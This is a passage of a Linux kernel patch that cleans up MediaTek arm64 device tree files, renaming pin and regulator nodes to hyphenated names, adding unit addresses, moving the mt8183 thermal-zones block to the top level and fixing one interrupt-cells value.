+@@ -54,7 +54,7 @@
+ 		};
+ 	};
+ 
+-	memory {
++	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x20000000>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts
+index 0b5f154007be8..49c7185243cc1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts
+@@ -43,7 +43,7 @@
+ 		id-gpio = <&pio 16 GPIO_ACTIVE_HIGH>;
+ 	};
+ 
+-	usb_p1_vbus: regulator@0 {
++	usb_p1_vbus: regulator-usb-p1 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "usb_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -52,7 +52,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p0_vbus: regulator@1 {
++	usb_p0_vbus: regulator-usb-p0 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vbus";
+ 		regulator-min-microvolt = <5000000>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-evb.dts b/arch/arm64/boot/dts/mediatek/mt8183-evb.dts
+index 52dc4a50e34d3..2ca0da51efaa0 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8183-evb.dts
+@@ -30,14 +30,14 @@
+ 		#address-cells = <2>;
+ 		#size-cells = <2>;
+ 		ranges;
+-		scp_mem_reserved: scp_mem_region {
++		scp_mem_reserved: memory@50000000 {
+ 			compatible = "shared-dma-pool";
+ 			reg = <0 0x50000000 0 0x2900000>;
+ 			no-map;
+ 		};
+ 	};
+ 
+-	ntc@0 {
++	thermal-sensor {
+ 		compatible = "murata,ncp03wf104";
+ 		pullup-uv = <1800000>;
+ 		pullup-ohm = <390000>;
+@@ -139,8 +139,8 @@
+ };
+ 
+ &pio {
+-	i2c_pins_0: i2c0{
+-		pins_i2c{
++	i2c_pins_0: i2c0 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO82__FUNC_SDA0>,
+ 				 <PINMUX_GPIO83__FUNC_SCL0>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -148,8 +148,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_1: i2c1{
+-		pins_i2c{
++	i2c_pins_1: i2c1 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO81__FUNC_SDA1>,
+ 				 <PINMUX_GPIO84__FUNC_SCL1>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -157,8 +157,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_2: i2c2{
+-		pins_i2c{
++	i2c_pins_2: i2c2 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO103__FUNC_SCL2>,
+ 				 <PINMUX_GPIO104__FUNC_SDA2>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -166,8 +166,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_3: i2c3{
+-		pins_i2c{
++	i2c_pins_3: i2c3 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO50__FUNC_SCL3>,
+ 				 <PINMUX_GPIO51__FUNC_SDA3>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -175,8 +175,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_4: i2c4{
+-		pins_i2c{
++	i2c_pins_4: i2c4 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO105__FUNC_SCL4>,
+ 				 <PINMUX_GPIO106__FUNC_SDA4>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -184,8 +184,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_5: i2c5{
+-		pins_i2c{
++	i2c_pins_5: i2c5 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO48__FUNC_SCL5>,
+ 				 <PINMUX_GPIO49__FUNC_SDA5>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -193,8 +193,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_0: spi0{
+-		pins_spi{
++	spi_pins_0: spi0 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO85__FUNC_SPI0_MI>,
+ 				 <PINMUX_GPIO86__FUNC_SPI0_CSB>,
+ 				 <PINMUX_GPIO87__FUNC_SPI0_MO>,
+@@ -308,8 +308,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_1: spi1{
+-		pins_spi{
++	spi_pins_1: spi1 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO161__FUNC_SPI1_A_MI>,
+ 				 <PINMUX_GPIO162__FUNC_SPI1_A_CSB>,
+ 				 <PINMUX_GPIO163__FUNC_SPI1_A_MO>,
+@@ -318,8 +318,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_2: spi2{
+-		pins_spi{
++	spi_pins_2: spi2 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO0__FUNC_SPI2_CSB>,
+ 				 <PINMUX_GPIO1__FUNC_SPI2_MO>,
+ 				 <PINMUX_GPIO2__FUNC_SPI2_CLK>,
+@@ -328,8 +328,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_3: spi3{
+-		pins_spi{
++	spi_pins_3: spi3 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO21__FUNC_SPI3_MI>,
+ 				 <PINMUX_GPIO22__FUNC_SPI3_CSB>,
+ 				 <PINMUX_GPIO23__FUNC_SPI3_MO>,
+@@ -338,8 +338,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_4: spi4{
+-		pins_spi{
++	spi_pins_4: spi4 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO17__FUNC_SPI4_MI>,
+ 				 <PINMUX_GPIO18__FUNC_SPI4_CSB>,
+ 				 <PINMUX_GPIO19__FUNC_SPI4_MO>,
+@@ -348,8 +348,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_5: spi5{
+-		pins_spi{
++	spi_pins_5: spi5 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO13__FUNC_SPI5_MI>,
+ 				 <PINMUX_GPIO14__FUNC_SPI5_CSB>,
+ 				 <PINMUX_GPIO15__FUNC_SPI5_MO>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+index 3ac83be536274..dccf367c7ec6c 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+@@ -101,6 +101,8 @@
+ 
+ &dsi0 {
+ 	status = "okay";
++	/delete-property/#size-cells;
++	/delete-property/#address-cells;
+ 	/delete-node/panel@0;
+ 	ports {
+ 		port {
+@@ -437,20 +439,20 @@
+ 	};
+ 
+ 	touchscreen_pins: touchscreen-pins {
+-		touch_int_odl {
++		touch-int-odl {
+ 			pinmux = <PINMUX_GPIO155__FUNC_GPIO155>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+ 
+-		touch_rst_l {
++		touch-rst-l {
+ 			pinmux = <PINMUX_GPIO156__FUNC_GPIO156>;
+ 			output-high;
+ 		};
+ 	};
+ 
+ 	trackpad_pins: trackpad-pins {
+-		trackpad_int {
++		trackpad-int {
+ 			pinmux = <PINMUX_GPIO7__FUNC_GPIO7>;
+ 			input-enable;
+ 			bias-disable; /* pulled externally */
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index 632fd89e75969..a428a581c93a8 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -108,7 +108,7 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		scp_mem_reserved: scp_mem_region {
++		scp_mem_reserved: memory@50000000 {
+ 			compatible = "shared-dma-pool";
+ 			reg = <0 0x50000000 0 0x2900000>;
+ 			no-map;
+@@ -423,7 +423,7 @@
+ 
+ &pio {
+ 	aud_pins_default: audiopins {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO97__FUNC_I2S2_MCK>,
+ 				<PINMUX_GPIO98__FUNC_I2S2_BCK>,
+ 				<PINMUX_GPIO101__FUNC_I2S2_LRCK>,
+@@ -445,7 +445,7 @@
+ 	};
+ 
+ 	aud_pins_tdm_out_on: audiotdmouton {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO169__FUNC_TDM_BCK_2ND>,
+ 				<PINMUX_GPIO170__FUNC_TDM_LRCK_2ND>,
+ 				<PINMUX_GPIO171__FUNC_TDM_DATA0_2ND>,
+@@ -457,7 +457,7 @@
+ 	};
+ 
+ 	aud_pins_tdm_out_off: audiotdmoutoff {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO169__FUNC_GPIO169>,
+ 				<PINMUX_GPIO170__FUNC_GPIO170>,
+ 				<PINMUX_GPIO171__FUNC_GPIO171>,
+@@ -471,13 +471,13 @@
+ 	};
+ 
+ 	bt_pins: bt-pins {
+-		pins_bt_en {
++		pins-bt-en {
+ 			pinmux = <PINMUX_GPIO120__FUNC_GPIO120>;
+ 			output-low;
+ 		};
+ 	};
+ 
+-	ec_ap_int_odl: ec_ap_int_odl {
++	ec_ap_int_odl: ec-ap-int-odl {
+ 		pins1 {
+ 			pinmux = <PINMUX_GPIO151__FUNC_GPIO151>;
+ 			input-enable;
+@@ -485,7 +485,7 @@
+ 		};
+ 	};
+ 
+-	h1_int_od_l: h1_int_od_l {
++	h1_int_od_l: h1-int-od-l {
+ 		pins1 {
+ 			pinmux = <PINMUX_GPIO153__FUNC_GPIO153>;
+ 			input-enable;
+@@ -493,7 +493,7 @@
+ 	};
+ 
+ 	i2c0_pins: i2c0 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO82__FUNC_SDA0>,
+ 				 <PINMUX_GPIO83__FUNC_SCL0>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -502,7 +502,7 @@
+ 	};
+ 
+ 	i2c1_pins: i2c1 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO81__FUNC_SDA1>,
+ 				 <PINMUX_GPIO84__FUNC_SCL1>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -511,7 +511,7 @@
+ 	};
+ 
+ 	i2c2_pins: i2c2 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO103__FUNC_SCL2>,
+ 				 <PINMUX_GPIO104__FUNC_SDA2>;
+ 			bias-disable;
+@@ -520,7 +520,7 @@
+ 	};
+ 
+ 	i2c3_pins: i2c3 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO50__FUNC_SCL3>,
+ 				 <PINMUX_GPIO51__FUNC_SDA3>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -529,7 +529,7 @@
+ 	};
+ 
+ 	i2c4_pins: i2c4 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO105__FUNC_SCL4>,
+ 				 <PINMUX_GPIO106__FUNC_SDA4>;
+ 			bias-disable;
+@@ -538,7 +538,7 @@
+ 	};
+ 
+ 	i2c5_pins: i2c5 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO48__FUNC_SCL5>,
+ 				 <PINMUX_GPIO49__FUNC_SDA5>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -547,7 +547,7 @@
+ 	};
+ 
+ 	i2c6_pins: i2c6 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO11__FUNC_SCL6>,
+ 				 <PINMUX_GPIO12__FUNC_SDA6>;
+ 			bias-disable;
+@@ -555,7 +555,7 @@
+ 	};
+ 
+ 	mmc0_pins_default: mmc0-pins-default {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO123__FUNC_MSDC0_DAT0>,
+ 				 <PINMUX_GPIO128__FUNC_MSDC0_DAT1>,
+ 				 <PINMUX_GPIO125__FUNC_MSDC0_DAT2>,
+@@ -570,13 +570,13 @@
+ 			mediatek,pull-up-adv = <01>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO124__FUNC_MSDC0_CLK>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <10>;
+ 		};
+ 
+-		pins_rst {
++		pins-rst {
+ 			pinmux = <PINMUX_GPIO133__FUNC_MSDC0_RSTB>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <01>;
+@@ -584,7 +584,7 @@
+ 	};
+ 
+ 	mmc0_pins_uhs: mmc0-pins-uhs {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO123__FUNC_MSDC0_DAT0>,
+ 				 <PINMUX_GPIO128__FUNC_MSDC0_DAT1>,
+ 				 <PINMUX_GPIO125__FUNC_MSDC0_DAT2>,
+@@ -599,19 +599,19 @@
+ 			mediatek,pull-up-adv = <01>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO124__FUNC_MSDC0_CLK>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <10>;
+ 		};
+ 
+-		pins_ds {
++		pins-ds {
+ 			pinmux = <PINMUX_GPIO131__FUNC_MSDC0_DSL>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <10>;
+ 		};
+ 
+-		pins_rst {
++		pins-rst {
+ 			pinmux = <PINMUX_GPIO133__FUNC_MSDC0_RSTB>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-up-adv = <01>;
+@@ -619,7 +619,7 @@
+ 	};
+ 
+ 	mmc1_pins_default: mmc1-pins-default {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO31__FUNC_MSDC1_CMD>,
+ 				 <PINMUX_GPIO32__FUNC_MSDC1_DAT0>,
+ 				 <PINMUX_GPIO34__FUNC_MSDC1_DAT1>,
+@@ -629,7 +629,7 @@
+ 			mediatek,pull-up-adv = <10>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO29__FUNC_MSDC1_CLK>;
+ 			input-enable;
+ 			mediatek,pull-down-adv = <10>;
+@@ -637,7 +637,7 @@
+ 	};
+ 
+ 	mmc1_pins_uhs: mmc1-pins-uhs {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO31__FUNC_MSDC1_CMD>,
+ 				 <PINMUX_GPIO32__FUNC_MSDC1_DAT0>,
+ 				 <PINMUX_GPIO34__FUNC_MSDC1_DAT1>,
+@@ -648,7 +648,7 @@
+ 			mediatek,pull-up-adv = <10>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO29__FUNC_MSDC1_CLK>;
+ 			drive-strength = <MTK_DRIVE_8mA>;
+ 			mediatek,pull-down-adv = <10>;
+@@ -656,15 +656,15 @@
+ 		};
+ 	};
+ 
+-	panel_pins_default: panel_pins_default {
+-		panel_reset {
++	panel_pins_default: panel-pins-default {
++		panel-reset {
+ 			pinmux = <PINMUX_GPIO45__FUNC_GPIO45>;
+ 			output-low;
+ 			bias-pull-up;
+ 		};
+ 	};
+ 
+-	pwm0_pin_default: pwm0_pin_default {
++	pwm0_pin_default: pwm0-pin-default {
+ 		pins1 {
+ 			pinmux = <PINMUX_GPIO176__FUNC_GPIO176>;
+ 			output-high;
+@@ -676,14 +676,14 @@
+ 	};
+ 
+ 	scp_pins: scp {
+-		pins_scp_uart {
++		pins-scp-uart {
+ 			pinmux = <PINMUX_GPIO110__FUNC_TP_URXD1_AO>,
+ 				 <PINMUX_GPIO112__FUNC_TP_UTXD1_AO>;
+ 		};
+ 	};
+ 
+ 	spi0_pins: spi0 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO85__FUNC_SPI0_MI>,
+ 				 <PINMUX_GPIO86__FUNC_GPIO86>,
+ 				 <PINMUX_GPIO87__FUNC_SPI0_MO>,
+@@ -693,7 +693,7 @@
+ 	};
+ 
+ 	spi1_pins: spi1 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO161__FUNC_SPI1_A_MI>,
+ 				 <PINMUX_GPIO162__FUNC_SPI1_A_CSB>,
+ 				 <PINMUX_GPIO163__FUNC_SPI1_A_MO>,
+@@ -703,20 +703,20 @@
+ 	};
+ 
+ 	spi2_pins: spi2 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO0__FUNC_SPI2_CSB>,
+ 				 <PINMUX_GPIO1__FUNC_SPI2_MO>,
+ 				 <PINMUX_GPIO2__FUNC_SPI2_CLK>;
+ 			bias-disable;
+ 		};
+-		pins_spi_mi {
++		pins-spi-mi {
+ 			pinmux = <PINMUX_GPIO94__FUNC_SPI2_MI>;
+ 			mediatek,pull-down-adv = <00>;
+ 		};
+ 	};
+ 
+ 	spi3_pins: spi3 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO21__FUNC_SPI3_MI>,
+ 				 <PINMUX_GPIO22__FUNC_SPI3_CSB>,
+ 				 <PINMUX_GPIO23__FUNC_SPI3_MO>,
+@@ -726,7 +726,7 @@
+ 	};
+ 
+ 	spi4_pins: spi4 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO17__FUNC_SPI4_MI>,
+ 				 <PINMUX_GPIO18__FUNC_SPI4_CSB>,
+ 				 <PINMUX_GPIO19__FUNC_SPI4_MO>,
+@@ -736,7 +736,7 @@
+ 	};
+ 
+ 	spi5_pins: spi5 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO13__FUNC_SPI5_MI>,
+ 				 <PINMUX_GPIO14__FUNC_SPI5_CSB>,
+ 				 <PINMUX_GPIO15__FUNC_SPI5_MO>,
+@@ -746,63 +746,63 @@
+ 	};
+ 
+ 	uart0_pins_default: uart0-pins-default {
+-		pins_rx {
++		pins-rx {
+ 			pinmux = <PINMUX_GPIO95__FUNC_URXD0>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+-		pins_tx {
++		pins-tx {
+ 			pinmux = <PINMUX_GPIO96__FUNC_UTXD0>;
+ 		};
+ 	};
+ 
+ 	uart1_pins_default: uart1-pins-default {
+-		pins_rx {
++		pins-rx {
+ 			pinmux = <PINMUX_GPIO121__FUNC_URXD1>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+-		pins_tx {
++		pins-tx {
+ 			pinmux = <PINMUX_GPIO115__FUNC_UTXD1>;
+ 		};
+-		pins_rts {
++		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+ 			output-enable;
+ 		};
+-		pins_cts {
++		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+ 			input-enable;
+ 		};
+ 	};
+ 
+ 	uart1_pins_sleep: uart1-pins-sleep {
+-		pins_rx {
++		pins-rx {
+ 			pinmux = <PINMUX_GPIO121__FUNC_GPIO121>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+-		pins_tx {
++		pins-tx {
+ 			pinmux = <PINMUX_GPIO115__FUNC_UTXD1>;
+ 		};
+-		pins_rts {
++		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+ 			output-enable;
+ 		};
+-		pins_cts {
++		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+ 			input-enable;
+ 		};
+ 	};
+ 
+ 	wifi_pins_pwrseq: wifi-pins-pwrseq {
+-		pins_wifi_enable {
++		pins-wifi-enable {
+ 			pinmux = <PINMUX_GPIO119__FUNC_GPIO119>;
+ 			output-low;
+ 		};
+ 	};
+ 
+ 	wifi_pins_wakeup: wifi-pins-wakeup {
+-		pins_wifi_wakeup {
++		pins-wifi-wakeup {
+ 			pinmux = <PINMUX_GPIO113__FUNC_GPIO113>;
+ 			input-enable;
+ 		};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts b/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts
+index a1d01639df30a..dd8d39861d9ca 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts
+@@ -178,7 +178,7 @@
+ 
+ &pio {
+ 	i2c_pins_0: i2c0 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO82__FUNC_SDA0>,
+ 				 <PINMUX_GPIO83__FUNC_SCL0>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -187,7 +187,7 @@
+ 	};
+ 
+ 	i2c_pins_1: i2c1 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO81__FUNC_SDA1>,
+ 				 <PINMUX_GPIO84__FUNC_SCL1>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -196,7 +196,7 @@
+ 	};
+ 
+ 	i2c_pins_2: i2c2 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO103__FUNC_SCL2>,
+ 				 <PINMUX_GPIO104__FUNC_SDA2>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -205,7 +205,7 @@
+ 	};
+ 
+ 	i2c_pins_3: i2c3 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO50__FUNC_SCL3>,
+ 				 <PINMUX_GPIO51__FUNC_SDA3>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -214,7 +214,7 @@
+ 	};
+ 
+ 	i2c_pins_4: i2c4 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO105__FUNC_SCL4>,
+ 				 <PINMUX_GPIO106__FUNC_SDA4>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -223,7 +223,7 @@
+ 	};
+ 
+ 	i2c_pins_5: i2c5 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO48__FUNC_SCL5>,
+ 				 <PINMUX_GPIO49__FUNC_SDA5>;
+ 			mediatek,pull-up-adv = <3>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 268a1f28af8ce..10779a9947fe2 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1136,127 +1136,6 @@
+ 			nvmem-cell-names = "calibration-data";
+ 		};
+ 
+-		thermal_zones: thermal-zones {
+-			cpu_thermal: cpu-thermal {
+-				polling-delay-passive = <100>;
+-				polling-delay = <500>;
+-				thermal-sensors = <&thermal 0>;
+-				sustainable-power = <5000>;
+-
+-				trips {
+-					threshold: trip-point0 {
+-						temperature = <68000>;
+-						hysteresis = <2000>;
+-						type = "passive";
+-					};
+-
+-					target: trip-point1 {
+-						temperature = <80000>;
+-						hysteresis = <2000>;
+-						type = "passive";
+-					};
+-
+-					cpu_crit: cpu-crit {
+-						temperature = <115000>;
+-						hysteresis = <2000>;
+-						type = "critical";
+-					};
+-				};
+-
+-				cooling-maps {
+-					map0 {
+-						trip = <&target>;
+-						cooling-device = <&cpu0
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu1
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu2
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu3
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>;
+-						contribution = <3072>;
+-					};
+-					map1 {
+-						trip = <&target>;
+-						cooling-device = <&cpu4
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu5
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu6
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu7
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>;
+-						contribution = <1024>;
+-					};
+-				};
+-			};
+-
+-			/* The tzts1 ~ tzts6 don't need to polling */
+-			/* The tzts1 ~ tzts6 don't need to thermal throttle */
+-
+-			tzts1: tzts1 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 1>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts2: tzts2 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 2>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts3: tzts3 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 3>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts4: tzts4 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 4>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts5: tzts5 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 5>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tztsABB: tztsABB {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 6>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-		};
+-
+ 		pwm0: pwm@1100e000 {
+ 			compatible = "mediatek,mt8183-disp-pwm";
+ 			reg = <0 0x1100e000 0 0x1000>;
+@@ -2031,4 +1910,125 @@
+ 			power-domains = <&spm MT8183_POWER_DOMAIN_CAM>;
+ 		};
+ 	};
++
++	thermal_zones: thermal-zones {
++		cpu_thermal: cpu-thermal {
++			polling-delay-passive = <100>;
++			polling-delay = <500>;
++			thermal-sensors = <&thermal 0>;
++			sustainable-power = <5000>;
++
++			trips {
++				threshold: trip-point0 {
++					temperature = <68000>;
++					hysteresis = <2000>;
++					type = "passive";
++				};
++
++				target: trip-point1 {
++					temperature = <80000>;
++					hysteresis = <2000>;
++					type = "passive";
++				};
++
++				cpu_crit: cpu-crit {
++					temperature = <115000>;
++					hysteresis = <2000>;
++					type = "critical";
++				};
++			};
++
++			cooling-maps {
++				map0 {
++					trip = <&target>;
++					cooling-device = <&cpu0
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu1
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu2
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu3
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>;
++					contribution = <3072>;
++				};
++				map1 {
++					trip = <&target>;
++					cooling-device = <&cpu4
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu5
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu6
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu7
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>;
++					contribution = <1024>;
++				};
++			};
++		};
++
++		/* The tzts1 ~ tzts6 don't need to polling */
++		/* The tzts1 ~ tzts6 don't need to thermal throttle */
++
++		tzts1: tzts1 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 1>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts2: tzts2 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 2>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts3: tzts3 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 3>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts4: tzts4 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 4>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts5: tzts5 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 5>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tztsABB: tztsABB {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 6>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++	};
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+index 9b62e161db261..4b8a1c462906e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+@@ -207,7 +207,7 @@
+ 	pinctrl-0 = <&i2c7_pins>;
+ 
+ 	pmic@34 {
+-		#interrupt-cells = <1>;
++		#interrupt-cells = <2>;
+ 		compatible = "mediatek,mt6360";
+ 		reg = <0x34>;
